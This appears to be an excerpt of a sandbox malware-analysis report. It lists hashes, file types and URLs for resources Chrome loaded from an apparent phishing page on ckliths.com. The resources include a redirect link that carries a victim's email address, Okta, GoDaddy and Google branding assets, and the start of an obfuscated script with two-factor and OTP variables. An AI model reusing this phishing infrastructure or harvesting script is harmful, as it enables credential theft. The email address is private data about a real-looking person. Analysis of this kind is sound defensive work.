                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CE3E019BC27E936BD1AACDB64B25A06D
                                                    SHA1:30FFA6E52416FF966EC2DD32922AA14C18C4039B
                                                    SHA-256:EE18FA1ADA74C5D3261424BCC1C4F077510C31A06BEE0FF6742F180ED14C57D8
                                                    SHA-512:98A6AD516944CD646083FF660ED351E9130318B6DA4F457EBFC0C6953F3D662D770A54D0533F97220691E07FABFD5305CD13409DB80CB7F83D650ED5BFCA8B4F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):35970
                                                    Entropy (8bit):7.989503040923577
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                    SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                    SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                    SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/yzWqDIZfOjit56hM1AVNqr50
                                                    Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10017)
                                                    Category:dropped
                                                    Size (bytes):10245
                                                    Entropy (8bit):5.437589264532084
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):35748
                                                    Entropy (8bit):5.056772709760769
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:94C952E68CD89B529170B6B82C994BBE
                                                    SHA1:822F28855D88DA679AF6E8A437316D72433965D4
                                                    SHA-256:5A55CE5E458408B483A2B08C45444E987124FD0857D68F12C9A2EAE76BB8A8C4
                                                    SHA-512:EF59FD62B3E33A20A78157A620BB05A463138CF92EFE597E70D3F9EDAAB499FA9B72CF2E29DCEF9ED7C7D7764E42111B690D30A7328D2FA9760F40BEF1E10548
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/ab09afp6pq9APief30
                                                    Preview:#sections_godaddy {..font-family: gdsherpa;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {.. color: var(--ux-1j87vvn,#fff);.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap: .5em;.. displa
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):61
                                                    Entropy (8bit):3.990210155325004
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):122061
                                                    Entropy (8bit):5.207768728374116
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:90994578520114F98D6FFDE38882AFB5
                                                    SHA1:CA81F5DBAEFD6ED9733184141FA67B290867B614
                                                    SHA-256:59D0DE8C2C7D41A3ACD63EFB3241F40BF7C0243E7158CED3C7FB647DDE3AE1BA
                                                    SHA-512:D94E85BBF534C453F75CEC10F96431C08A574731A04CC52FAF54F04EF8099D2784871A9236636EA74223DDE4EB12D0A37657A3D8AF65B75447BA8BD364F12F43
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/56mjNuYi8NFj9axNkleelVGasUGj89110
                                                    Preview:const _0x2f5478=_0x4353;(function(_0x5cf133,_0x19e1fa){const _0x4d4154=_0x4353,_0x1236e0=_0x5cf133();while(!![]){try{const _0x1582b5=-parseInt(_0x4d4154(0x2a9))/0x1*(parseInt(_0x4d4154(0x216))/0x2)+parseInt(_0x4d4154(0x212))/0x3*(parseInt(_0x4d4154(0x224))/0x4)+parseInt(_0x4d4154(0x1ae))/0x5*(parseInt(_0x4d4154(0x20a))/0x6)+-parseInt(_0x4d4154(0x1bc))/0x7+-parseInt(_0x4d4154(0x1ce))/0x8*(parseInt(_0x4d4154(0x2e6))/0x9)+parseInt(_0x4d4154(0x21d))/0xa*(parseInt(_0x4d4154(0x35c))/0xb)+parseInt(_0x4d4154(0x30a))/0xc;if(_0x1582b5===_0x19e1fa)break;else _0x1236e0['push'](_0x1236e0['shift']());}catch(_0x3e2ebf){_0x1236e0['push'](_0x1236e0['shift']());}}}(_0x1625,0x6e90e));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null;!document[_0x2f5478(0x2bb)](_0x2f5478(0x1fd))[_0x2f5478(0x1c3)]['contains'](_0x2f5478(0x26e))&&(view=_0x2f5478(0x2ae));document[_0x2f5478(0x2bb)](_0x2f5478(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                    Category:downloaded
                                                    Size (bytes):28584
                                                    Entropy (8bit):7.992563951996154
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/78XGtgY3QwUjj45wlxist57
                                                    Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 154228, version 769.768
                                                    Category:downloaded
                                                    Size (bytes):154228
                                                    Entropy (8bit):7.996770916751852
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:55B416A8DF21F9F987AA352F10D1343B
                                                    SHA1:2717F3F58271F2F2E6120D9937C7227002656D34
                                                    SHA-256:D76FB4E841748A3F6BC63EFA23156E02631C283BF41F84EFCBDAF339EA3E1B73
                                                    SHA-512:7C4983811EBA2AE80998C62C0EB48CC53EEC26E3CA4222D5CF0A758A5EA92E6A14DCFED4FE5B7EF5513F89BE2C0F336D0131687FA3EDDCBD4BB218BBD6BEB985
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2
                                                    Preview:wOF2......Zt.......(..Z).........................8.$. .`..(...@..(.,..p. .....Hp......aD.f.O..q....@UUUU....l......G?../~.....O.................O......l...x}~.....=...N.'........Gu@..p1.G.....f,.*..V<[..W..U.W#......@....."[.D.8....L..7I......O.{v....E.bQY..B.P+F..)...?......<....e...4.X...H.`tA...@.@.v........GT.~!].....VV7..L.&.D..p.\G..~g.....^....ew.kT..3........pa.......W....A7..`.t/I;.3-K.vdK....D.m.ds.....A...b...#.?...G.O.m..=.....ux.:..gr.......3...v..t.{.p.x..@H..$.B#.H.....4rB.>..........'..8.......pj.<.h4..g..q,Y...Nb[.....ms.^L.0...]}....~.'....w?a>.9?.........H.O.fF#i4....L..;..4q...7a.m.m...R..3.\.v...b.....]B/Aex......lo.f..e .!.@X5....wb...q....=QL..R.._.............EE.W..._..Z.K...q.....2..........`..6..C...jj..#&A=@.>^..N.2.3....P.....t....Y.i..T..LN2..:x.V\..Z.7../1|.x.V..~......=3.!...y...lz.O..<.dgCR4.A....8.p.aq...h.....6.>.e:...NQ.h....L.G2.V[.f...Ai.=+..+ ...'l..i.+C.t)s.(j...WZ_:..\9.Y..U.]......A.y..9........\xf.;.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):10796
                                                    Entropy (8bit):7.946024875001343
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (51734)
                                                    Category:downloaded
                                                    Size (bytes):222931
                                                    Entropy (8bit):5.0213311632628725
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0329C939FCA7C78756B94FBCD95E322B
                                                    SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                    SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                    SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                    Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):2905
                                                    Entropy (8bit):3.962263100945339
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FE87496CC7A44412F7893A72099C120A
                                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1660
                                                    Entropy (8bit):4.301517070642596
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 20 x 15, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):4.035372245524405
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6051A76127A57C5A621994DB910983AA
                                                    SHA1:8A0781A92CB293CC65EFAFFB3EFFD57A610F4082
                                                    SHA-256:8DD72DBFA8125D0EC3C3622C438AC5DE58D657B83EC64AB53537519737AEF1F1
                                                    SHA-512:223CBDE1B4FB31B9A338AEF78CCC28E0FCB825BDE7437C9959341BF7E0CC94B61BE05AD0CE5DA1E95C840D3C296DBB29AF55D5EA67C30AE7921ECCC6B878276D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ba6c9cecef642c1/1724874187863/cD-j42r2dr6K81x
                                                    Preview:.PNG........IHDR.............k.x.....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text
                                                    Category:downloaded
                                                    Size (bytes):594
                                                    Entropy (8bit):5.209476191816484
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:93C5358BD739797B1A14F3E997088AF9
                                                    SHA1:3222A3FDE9DD0850E62AB2526651DC9832049A7C
                                                    SHA-256:1147FCCF2BCDC1DE35E6367DAC2E94D71C915D2E3B7A50F32323CE8199F1293F
                                                    SHA-512:654440F6BE1A48D320B243ACBFC073F56A771380E6855ACC4D1DB6346F2598A1FF0A8CCED7904B9A266078E5338BBD4E690F03B3BC11083A734F9DBF13D83745
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://href.li/?https://OivbP.ckliths.com/XtotvxIy/?em=sschultz@firstfedweb.com
                                                    Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://OivbP.ckliths.com/XtotvxIy/?em=sschultz@firstfedweb.com" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/OivbP.ckliths.com\/XtotvxIy\/?em=sschultz@firstfedweb.com" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://OivbP.ckliths.com/XtotvxIy/?em=sschultz@firstfedweb.com">https://OivbP.ckliths.com/XtotvxIy/?em=sschultz@firstfedweb.com</a></p></body></html>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text
                                                    Category:downloaded
                                                    Size (bytes):23427
                                                    Entropy (8bit):5.112735417225198
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BA0537E9574725096AF97C27D7E54F76
                                                    SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                    SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                    SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.w3schools.com/w3css/4/w3.css
                                                    Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 105536, version 769.768
                                                    Category:downloaded
                                                    Size (bytes):105536
                                                    Entropy (8bit):7.989150976486913
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CD2B4095E9CE66CDE642C3502A4022D9
                                                    SHA1:A280ECDDDD14695FAD22599301AB03ADFE5224C0
                                                    SHA-256:404C746C8F7E3F9B7611A8F23D908C1A32A5C972236B9D89BB68B05D9BF4B905
                                                    SHA-512:062782597F37B964A5F285FE8B75AC2CC57E99024FA6C9BF841DC2E7B930CE6CFC12EA5F32D2A6B7301A74FFBB552457A2A82ED9D945E135D8B027F506BF5D77
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2
                                                    Preview:wOF2.......@.....................................8.$. .`..P..H....T.. . ..WQg......V?..H.I...U.:1....~..?................s...y..*...Y.KEF.......SQ.R].H.H@.oa.....~?..{&@g6i..a...U...z5...x...<........I........,.".....W.7v.$v...t..F]...X.X[..k..su.O.<.......V./.z..;.\....=y7.....]B.8.$`.Y.3....uTT.0.5..7~1...y~........WU.tWM.m....i@.A.-...l'..!.80!..q.'@h?t..Q.-........._.O.S.t..-.b...>..NE$c..O..AT....w .H.A..yK6..PYQ...c.%......}..i.6..X......:.D{...{...}....@.>P........P|.......Ud.BQ.^%.f.%M.b..R...h.j.PUk.....l....c..".....5Kn....Jc.&..&..."..9.....Q`........m.E...:M......\..yIMdZ]..].I..*...#t.shk.u.. .Ld.]{..&......3.UE.PG.0(..6`....B..7<j]....6....z.......\.$l....6BQ..WU...y?[....Unb.....K}T.........p..Z.t.....u..1..._.h).z..m.=`.....p.........{~...i..r.s........v.m|..c0..f.:..1...l..Y....>.........C..O...Xf.K....I...|...Y..=.e.0...^+.w...2....+L......"..X/.~:_..m/.o..B..4.LJ.'..3....f.N..;-9#..e:.J.a;K.9*.I....T.w=.0.....n.K.t..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):49602
                                                    Entropy (8bit):7.881935507115631
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DB783743CD246FF4D77F4A3694285989
                                                    SHA1:B9466716904457641B7831868B47162D8D378D41
